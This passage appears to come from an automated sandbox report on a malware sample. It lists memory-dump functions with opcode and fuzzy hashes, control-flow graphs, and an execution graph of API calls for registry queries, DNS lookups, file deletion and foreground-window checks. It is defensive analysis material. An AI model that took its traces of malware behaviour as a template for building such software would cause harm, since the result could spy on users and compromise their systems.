                                                        • ResumeThread.KERNELBASE(?), ref: 0049A346
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.432590137.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_490000_plugmancdht5461.jbxd
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: 23378afea5d8ea87308d574f2293470598beb148bfb481fd885a147bd100f5d4
                                                        • Instruction ID: 2c02037b08287abb3db1e493680fc2405a559a560d24bdf9ae64f04ea0d9ef85
                                                        • Opcode Fuzzy Hash: 23378afea5d8ea87308d574f2293470598beb148bfb481fd885a147bd100f5d4
                                                        • Instruction Fuzzy Hash: 4C31BBB4D002189FCF10CFA9D884ADEFBB5BB49314F14982AE815B7300D775A902CF95
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0010D1D4 Relevance: .1, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.432227916.000000000010D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0010D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_10d000_plugmancdht5461.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3217183b488b5642ca74d9317c0072ec6fc3c45600342e473b33569ed365fbd7
                                                        • Instruction ID: c6f240008622ff4502ea349bd8ed4b8e5540e22539b52648cebc0bc8aef5f79d
                                                        • Opcode Fuzzy Hash: 3217183b488b5642ca74d9317c0072ec6fc3c45600342e473b33569ed365fbd7
                                                        • Instruction Fuzzy Hash: 182146B0600304EFDB05CF90E8C0B26BBA5FB84314F34C96DE8894B282C3B6D806CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0010D01C Relevance: .1, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.432227916.000000000010D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0010D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_10d000_plugmancdht5461.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 32af73b7cf2bc47ec099c0abb6c9b94aab02d3033548a8747675fab197cc55b7
                                                        • Instruction ID: b1af94c6ba3260b776bc1e722e6dc405d440a67fab4c5bccef8c61bb1bc3cc96
                                                        • Opcode Fuzzy Hash: 32af73b7cf2bc47ec099c0abb6c9b94aab02d3033548a8747675fab197cc55b7
                                                        • Instruction Fuzzy Hash: 832134B4604204EFDB14CF90E884B16BBA5FB84314F34C969E88D4B28AC7B7D807CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0010D017 Relevance: .1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.432227916.000000000010D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0010D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_10d000_plugmancdht5461.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2fb1eadd20ac99aa6da4a8f5c02d96e998fa6aeb7b9a37f1f5f61c90f9c305a4
                                                        • Instruction ID: ad2aac966e9014a23aaeb01f911c9276d736341c8023747a76cc5ed514a27c2b
                                                        • Opcode Fuzzy Hash: 2fb1eadd20ac99aa6da4a8f5c02d96e998fa6aeb7b9a37f1f5f61c90f9c305a4
                                                        • Instruction Fuzzy Hash: 4311BE75504280CFCB11CF50E584B15BB61FB44314F24C6A9E8494B69AC37AD84ACB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0010D1CF Relevance: .1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.432227916.000000000010D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0010D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_10d000_plugmancdht5461.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2fb1eadd20ac99aa6da4a8f5c02d96e998fa6aeb7b9a37f1f5f61c90f9c305a4
                                                        • Instruction ID: 2e7459ec643fe3b06245ba3ec37a1801fbdb118e5cc72de54d766bbdbcd18882
                                                        • Opcode Fuzzy Hash: 2fb1eadd20ac99aa6da4a8f5c02d96e998fa6aeb7b9a37f1f5f61c90f9c305a4
                                                        • Instruction Fuzzy Hash: FC11DD75904280DFCB12CF54E5C4B15FFA1FB84314F28C6ADD8494B696C37AD85ACB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 000FD1C1 Relevance: .0, Instructions: 45COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.432216686.00000000000FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000FD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_fd000_plugmancdht5461.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d3251e7f1ed09a2a2101eadc7b841d519c19c516e96f7771e73b01305c665de4
                                                        • Instruction ID: 250f8738e2d710caa13c6392b92298e7442164a66c3e67fd945940d49beecc9a
                                                        • Opcode Fuzzy Hash: d3251e7f1ed09a2a2101eadc7b841d519c19c516e96f7771e73b01305c665de4
                                                        • Instruction Fuzzy Hash: EE018871004748AAEBA08A55D888B77BFDDEF61324F148517EE091B582C374DC41E6B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 000FD1C0 Relevance: .0, Instructions: 36COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.432216686.00000000000FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000FD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_fd000_plugmancdht5461.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2b179bd5a191dc40049b00a7068a5278b311769cf114554800b37e1343066b89
                                                        • Instruction ID: a92e94d7b17947ca24fd031c0eebb217b694f6bf714d297100ec7af442980fb7
                                                        • Opcode Fuzzy Hash: 2b179bd5a191dc40049b00a7068a5278b311769cf114554800b37e1343066b89
                                                        • Instruction Fuzzy Hash: 64F06272404744AAEB508A55D8C8B62FFD8EBA1724F28C55AEE085B682C3799C44DBB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Function 0049505A Relevance: 2.6, Strings: 2, Instructions: 109COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.432590137.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_490000_plugmancdht5461.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: UUUU$utq
                                                        • API String ID: 0-2270469796
                                                        • Opcode ID: aaab5e3a48d626753b699a712a2fa0f6e54e9f6dff117356c82adac21e9c89c1
                                                        • Instruction ID: 438ff82aabfcdc80293f747d7887e1cd309e91e255860ad6716e5e9200234c7b
                                                        • Opcode Fuzzy Hash: aaab5e3a48d626753b699a712a2fa0f6e54e9f6dff117356c82adac21e9c89c1
                                                        • Instruction Fuzzy Hash: 20513770E156288BEBA4CFADC881BCDBBF1BB88314F5486A9D058E7205D7349A85CF15
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00493998 Relevance: .2, Instructions: 151COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.432590137.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_490000_plugmancdht5461.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e9142e1a7f9a81b494c50928549c5fac1355540e1ddbe934bba2f00f1fe8b574
                                                        • Instruction ID: dd9e629286ed0f812dd42c2a5e64f8e3c675a53c5ef06c08676e992a4e81a64f
                                                        • Opcode Fuzzy Hash: e9142e1a7f9a81b494c50928549c5fac1355540e1ddbe934bba2f00f1fe8b574
                                                        • Instruction Fuzzy Hash: 2C518F709002098FDB44EFB9E851AAE7FF6BF84304F00C939D0459B769DBB459469B81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004939A8 Relevance: .2, Instructions: 151COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.432590137.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_490000_plugmancdht5461.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5ac3052b089334c9e57e5592cb90d071b495f0465a79ce88cfc01f1dd14f40cd
                                                        • Instruction ID: 712ebae562fed72df071eb295bf18a5be1fbd2d86207562d4504211e28f22d35
                                                        • Opcode Fuzzy Hash: 5ac3052b089334c9e57e5592cb90d071b495f0465a79ce88cfc01f1dd14f40cd
                                                        • Instruction Fuzzy Hash: 405150709002098FDB44EFB9E8517AEBBF6BF84304F00C939D144AB769DB7459469B51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00493C10 Relevance: .1, Instructions: 108COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.432590137.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_490000_plugmancdht5461.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 91af0fe5aa476259fd37dfd83ae9430c8479e3e4d3ea6c447129b16c63e7a11f
                                                        • Instruction ID: 88d9dd58e56f723d7d16b0f18485514ea8552f30e5f388327f482387add5c963
                                                        • Opcode Fuzzy Hash: 91af0fe5aa476259fd37dfd83ae9430c8479e3e4d3ea6c447129b16c63e7a11f
                                                        • Instruction Fuzzy Hash: 304163B1E01A588BEB6CCF6B8D4078AFAF7AFC9300F14C1BA850CA6215DB7049858F15
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00493C00 Relevance: .1, Instructions: 103COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.432590137.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_490000_plugmancdht5461.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9ba075d6d5433e8095814e27885d6ae0a7fd480a53a9e8a5fe818b2c84b38d05
                                                        • Instruction ID: 6f38b14e058f8ee018de58a58ee36751ea6ba543cbd8054aefae18435f158294
                                                        • Opcode Fuzzy Hash: 9ba075d6d5433e8095814e27885d6ae0a7fd480a53a9e8a5fe818b2c84b38d05
                                                        • Instruction Fuzzy Hash: EC4124B1E016588BEB6CCF6B8D4079AFAF3AFC9300F14C1BA850CAA255EB7005858F15
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0049012C Relevance: .1, Instructions: 86COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.432590137.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_490000_plugmancdht5461.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4419c2fab062851e589a20cfb301ca073d1c0919df0ff40ae09e0d576680cce5
                                                        • Instruction ID: 6165c8c2fa6c3efd8ae1907159b502ac102b479b9bb2e20c141542bcbf2e7e43
                                                        • Opcode Fuzzy Hash: 4419c2fab062851e589a20cfb301ca073d1c0919df0ff40ae09e0d576680cce5
                                                        • Instruction Fuzzy Hash: F1317A30E016189FDB48CFAAD98069EFBF7AFC9300F20D47AD408A7264EB3459858B45
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0049D6E8 Relevance: .1, Instructions: 80COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.432590137.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_490000_plugmancdht5461.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7895f426c15f33f19ab99dcd15f247b467177ee6ae7667da5ecfe18c882049ad
                                                        • Instruction ID: 226f7397b520587f70ec351cb8c784195a656db176ebcc5db811dea3950c305e
                                                        • Opcode Fuzzy Hash: 7895f426c15f33f19ab99dcd15f247b467177ee6ae7667da5ecfe18c882049ad
                                                        • Instruction Fuzzy Hash: DC31D970D0062ACBDB28CF67C9047DABAF2AF89304F14C1FAC41CA7655EB740A858E45
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00490790 Relevance: .1, Instructions: 80COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.432590137.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_490000_plugmancdht5461.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 51e349bce07159f3df5bfc065080ca359ed784bebe6f76ab4919b1f33030a9cc
                                                        • Instruction ID: ca539bb5677dcb196171c8b7047456ccfa6334886b41ce17532fb99ac617f0e6
                                                        • Opcode Fuzzy Hash: 51e349bce07159f3df5bfc065080ca359ed784bebe6f76ab4919b1f33030a9cc
                                                        • Instruction Fuzzy Hash: 8E317A70E016589FDB48CFAAD88069EFBF3AFC9300F24C56AD408A7264EB345985CB51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Execution Graph

                                                        Execution Coverage:17.9%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:33
                                                        Total number of Limit Nodes:2
                                                        execution_graph 13672 600e30 13673 600e59 13672->13673 13676 6010a8 13673->13676 13677 60110f DnsQuery_A 13676->13677 13679 6011e8 13677->13679 13680 4b09e8 13681 4b09ed 13680->13681 13684 4b0e08 13681->13684 13682 4b09fc 13685 4b0e26 13684->13685 13686 4b0f69 13685->13686 13688 4b5200 13685->13688 13686->13682 13691 4b5755 13688->13691 13692 4b5792 13691->13692 13695 4b5820 13692->13695 13693 4b521d 13705 4b1484 13695->13705 13697 4b5851 13697->13693 13698 4b584d 13698->13697 13699 4b5390 RegQueryValueExA 13698->13699 13702 4b5879 13699->13702 13700 4b539c RegCloseKey 13701 4b58de 13700->13701 13701->13693 13703 4b5390 RegQueryValueExA 13702->13703 13704 4b58d0 13702->13704 13703->13704 13704->13700 13706 4b5910 RegOpenKeyExA 13705->13706 13708 4b5a0f 13706->13708 13709 4b78b8 13710 4b790b DeleteFileA 13709->13710 13712 4b79a4 13710->13712 13713 4b5eb0 13714 4b5eef GetForegroundWindow 13713->13714 13715 4b5f1e 13714->13715

                                                        Executed Functions

                                                        Function 04923C50 Relevance: .3, Instructions: 283COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.692910959.0000000004920000.00000040.00000800.00020000.00000000.sdmp, Offset: 04920000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_4920000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3788e4d892f10ead885728ac5f5aa89bd60d3dcdbe4167fa0ae79917a140154d
                                                        • Instruction ID: 3f05b55629804707c5556b067e28758b75ba2a4f6671716d9162015ddd26a86f
                                                        • Opcode Fuzzy Hash: 3788e4d892f10ead885728ac5f5aa89bd60d3dcdbe4167fa0ae79917a140154d
                                                        • Instruction Fuzzy Hash: 8DB15B70E00219DFDB24CFB9D9857DEBBF6BF48304F148529E815A7298DB38A845CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04924540 Relevance: .3, Instructions: 268COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.692910959.0000000004920000.00000040.00000800.00020000.00000000.sdmp, Offset: 04920000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_4920000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8e1c03a1c4f467c6348f2a08337e7deac95608859b69aa111f8638c2af007d99
                                                        • Instruction ID: c91de01ea47e315af8c2cfc185363f6b7eafd7295e71a7c8c20a7c60d69a0c18
                                                        • Opcode Fuzzy Hash: 8e1c03a1c4f467c6348f2a08337e7deac95608859b69aa111f8638c2af007d99
                                                        • Instruction Fuzzy Hash: DBB17B70E002299FDB10CFA8C9857DDBBF6BF88304F148539D815AB298EB74A845CF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 049204E8 Relevance: .2, Instructions: 245COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.692910959.0000000004920000.00000040.00000800.00020000.00000000.sdmp, Offset: 04920000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_4920000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d26948973437f1007c3a6907f3aea0c1e765e1bdc2d05dac8684cddda590090a
                                                        • Instruction ID: 8af89f24684d918dd69ce86d68da25ff1c8ad83c1588f1e5d8e6fc3ce8ce3a92
                                                        • Opcode Fuzzy Hash: d26948973437f1007c3a6907f3aea0c1e765e1bdc2d05dac8684cddda590090a
                                                        • Instruction Fuzzy Hash: 26918C31F011269FC714DBA9D980A9EB7E7AFC8314F2A8475E5059B369EB31ED01CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 049249B0 Relevance: 3.9, Strings: 3, Instructions: 117COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 79 49249b0-49249b8 80 49249e7 79->80 82 49249c0-49249c9 80->82 83 4924a1d-4924a5c 80->83 84 49249d7-49249de 82->84 85 49249cb-49249cd 82->85 99 4924a94-4924a9e 83->99 86 49249e0 84->86 87 4924a17-4924a1a 84->87 85->84 86->80 89 49249f7-4924a03 86->89 90 4924a05-4924a0d 86->90 91 49249e9-49249f5 86->91 92 4924a0f 86->92 124 49249fb call 49249b0 89->124 125 49249fb call 4924a38 89->125 90->87 91->87 92->87 106 4924aee-4924af6 99->106 107 4924a6d-4924a76 99->107 103 4924a01 103->87 108 4924a84-4924a8b 107->108 109 4924a78-4924a7a 107->109 110 4924ae9-4924aed 108->110 111 4924a8d 108->111 109->108 111->99 111->110 113 4924aa0 111->113 114 4924ac6-4924ae2 111->114 115 4924ab4-4924aba 111->115 116 4924aaa-4924ab2 111->116 117 4924abc-4924ac4 111->117 120 4924aa8 113->120 114->110 115->110 116->110 117->110 120->110 124->103 125->103
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.692910959.0000000004920000.00000040.00000800.00020000.00000000.sdmp, Offset: 04920000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_4920000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $.X$0FX$0FX
                                                        • API String ID: 0-155833741
                                                        • Opcode ID: 8b6fd31e9248ed06eafb9c2ee1326c737d3a70ee63da2e7bbf6a1a2b368bf54f
                                                        • Instruction ID: a5710608299f2627861c39c5f5ee29023a6667dcabfe4fd4aa1512a7cd0946fe
                                                        • Opcode Fuzzy Hash: 8b6fd31e9248ed06eafb9c2ee1326c737d3a70ee63da2e7bbf6a1a2b368bf54f
                                                        • Instruction Fuzzy Hash: B931F530308171EFC7099BA0665407D7FB7FB812107448C7BD4179B54AEB25AC07E795
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004B5390 Relevance: 1.7, APIs: 1, Instructions: 187registryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 900 4b5390-4b5afd 903 4b5aff-4b5b09 900->903 904 4b5b36-4b5b5e 900->904 903->904 905 4b5b0b-4b5b0d 903->905 909 4b5bcf-4b5bd3 904->909 910 4b5b60-4b5b87 904->910 907 4b5b0f-4b5b19 905->907 908 4b5b30-4b5b33 905->908 911 4b5b1b 907->911 912 4b5b1d-4b5b2c 907->912 908->904 914 4b5c17-4b5c65 RegQueryValueExA 909->914 915 4b5bd5-4b5c13 909->915 922 4b5b89-4b5b8b 910->922 923 4b5bb7-4b5bbc 910->923 911->912 912->912 913 4b5b2e 912->913 913->908 917 4b5c6e-4b5c7c 914->917 918 4b5c67-4b5c6d 914->918 915->914 919 4b5c7e-4b5c8a 917->919 920 4b5c92-4b5cb9 917->920 918->917 919->920 930 4b5cbb-4b5cbf 920->930 931 4b5cc9-4b5ccd 920->931 926 4b5bad-4b5bb5 922->926 927 4b5b8d-4b5b97 922->927 935 4b5bbe-4b5bca 923->935 926->935 933 4b5b9b-4b5ba9 927->933 934 4b5b99 927->934 930->931 936 4b5cc1 930->936 937 4b5ccf-4b5cd3 931->937 938 4b5cdd 931->938 933->933 939 4b5bab 933->939 934->933 935->909 936->931 937->938 941 4b5cd5 937->941 942 4b5cde 938->942 939->926 941->938 942->942
                                                        APIs
                                                        • RegQueryValueExA.KERNEL32(00000000,004B5879,00020119,00000000,00000000,?), ref: 004B5C4F
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.690552044.00000000004B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_4b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: QueryValue
                                                        • String ID:
                                                        • API String ID: 3660427363-0
                                                        • Opcode ID: 24df532d1ee5720dca43e3bb7f2d9cdbbc1c3c1b426f531ada9d3df5a7b230db
                                                        • Instruction ID: d4b8cb3138550e13eb6f21d6b883af598e887744f75c82ba72b7eb042bcfc167
                                                        • Opcode Fuzzy Hash: 24df532d1ee5720dca43e3bb7f2d9cdbbc1c3c1b426f531ada9d3df5a7b230db
                                                        • Instruction Fuzzy Hash: 09713670D046099FDB14CFA8C8947DEFBB1BF48314F24852AE819A7391D774A845CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004B5A85 Relevance: 1.7, APIs: 1, Instructions: 186registryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 944 4b5a85-4b5afd 947 4b5aff-4b5b09 944->947 948 4b5b36-4b5b5e 944->948 947->948 949 4b5b0b-4b5b0d 947->949 953 4b5bcf-4b5bd3 948->953 954 4b5b60-4b5b87 948->954 951 4b5b0f-4b5b19 949->951 952 4b5b30-4b5b33 949->952 955 4b5b1b 951->955 956 4b5b1d-4b5b2c 951->956 952->948 958 4b5c17-4b5c65 RegQueryValueExA 953->958 959 4b5bd5-4b5c13 953->959 966 4b5b89-4b5b8b 954->966 967 4b5bb7-4b5bbc 954->967 955->956 956->956 957 4b5b2e 956->957 957->952 961 4b5c6e-4b5c7c 958->961 962 4b5c67-4b5c6d 958->962 959->958 963 4b5c7e-4b5c8a 961->963 964 4b5c92-4b5cb9 961->964 962->961 963->964 974 4b5cbb-4b5cbf 964->974 975 4b5cc9-4b5ccd 964->975 970 4b5bad-4b5bb5 966->970 971 4b5b8d-4b5b97 966->971 979 4b5bbe-4b5bca 967->979 970->979 977 4b5b9b-4b5ba9 971->977 978 4b5b99 971->978 974->975 980 4b5cc1 974->980 981 4b5ccf-4b5cd3 975->981 982 4b5cdd 975->982 977->977 983 4b5bab 977->983 978->977 979->953 980->975 981->982 985 4b5cd5 981->985 986 4b5cde 982->986 983->970 985->982 986->986
                                                        APIs
                                                        • RegQueryValueExA.KERNEL32(00000000,004B5879,00020119,00000000,00000000,?), ref: 004B5C4F
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.690552044.00000000004B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_4b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: QueryValue
                                                        • String ID:
                                                        • API String ID: 3660427363-0
                                                        • Opcode ID: 1983a30c9e337535eef7bfe4ac4cddf6aab26e6761d2b7f9774bbab93d1ebacc
                                                        • Instruction ID: 1ce53859c58315af6e6457011bd54ccf91fa642af94008a0a9aac4072551557b
                                                        • Opcode Fuzzy Hash: 1983a30c9e337535eef7bfe4ac4cddf6aab26e6761d2b7f9774bbab93d1ebacc
                                                        • Instruction Fuzzy Hash: 3D812570D04A089FDB14CFA8C8947DEFBB1BF49314F24852AE819A7391D774A885CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 006010A8 Relevance: 1.6, APIs: 1, Instructions: 139networkCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 988 6010a8-60111b 990 601154-6011e6 DnsQuery_A 988->990 991 60111d-601127 988->991 1000 6011e8-6011ee 990->1000 1001 6011ef-60123c 990->1001 991->990 992 601129-60112b 991->992 994 60112d-601137 992->994 995 60114e-601151 992->995 996 601139 994->996 997 60113b-60114a 994->997 995->990 996->997 997->997 999 60114c 997->999 999->995 1000->1001 1006 60124c-601250 1001->1006 1007 60123e-601242 1001->1007 1009 601252-601255 1006->1009 1010 60125f-601263 1006->1010 1007->1006 1008 601244 1007->1008 1008->1006 1009->1010 1011 601274 1010->1011 1012 601265-601271 1010->1012 1012->1011
                                                        APIs
                                                        • DnsQuery_A.DNSAPI(?,?,?,?,?,?), ref: 006011D0
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.690685990.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: true
                                                        • Associated: 00000009.00000002.690678018.00000000005F0000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_5f0000_RegSvcs.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Query_
                                                        • String ID:
                                                        • API String ID: 428220571-0
                                                        • Opcode ID: f3e1b74853a3702e4d3104f19830336e984aeaa52e3f3d75823e947878060000
                                                        • Instruction ID: dba7c9b17fb4f510a528982608d78ef2df1825ece25cf65573de3abb1ad98dd1
                                                        • Opcode Fuzzy Hash: f3e1b74853a3702e4d3104f19830336e984aeaa52e3f3d75823e947878060000
                                                        • Instruction Fuzzy Hash: 7551F8B1D002599FCF18CF99C8846DEBBB6FF49304F24852AE814BB290DB745986CF51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004B1484 Relevance: 1.6, APIs: 1, Instructions: 102registryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1014 4b1484-4b5977 1017 4b5979-4b5983 1014->1017 1018 4b59b0-4b5a0d RegOpenKeyExA 1014->1018 1017->1018 1019 4b5985-4b5987 1017->1019 1025 4b5a0f-4b5a15 1018->1025 1026 4b5a16-4b5a47 1018->1026 1021 4b59aa-4b59ad 1019->1021 1022 4b5989-4b5993 1019->1022 1021->1018 1023 4b5997-4b59a6 1022->1023 1024 4b5995 1022->1024 1023->1023 1027 4b59a8 1023->1027 1024->1023 1025->1026 1030 4b5a49-4b5a4d 1026->1030 1031 4b5a57 1026->1031 1027->1021 1030->1031 1032 4b5a4f 1030->1032 1033 4b5a58 1031->1033 1032->1031 1033->1033
                                                        APIs
                                                        • RegOpenKeyExA.KERNEL32(80000002,?,00000000,?,?), ref: 004B59F7
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.690552044.00000000004B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_4b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: Open
                                                        • String ID:
                                                        • API String ID: 71445658-0
                                                        • Opcode ID: fd17fcef6f1f5b0cc57c571e333ac6b48052f8c4bda07f10dac6a89dc8e4cf12
                                                        • Instruction ID: d5f8cac70db45e0612600599dbdc00c6ac8391d998f2e76b91a711d7224145f7
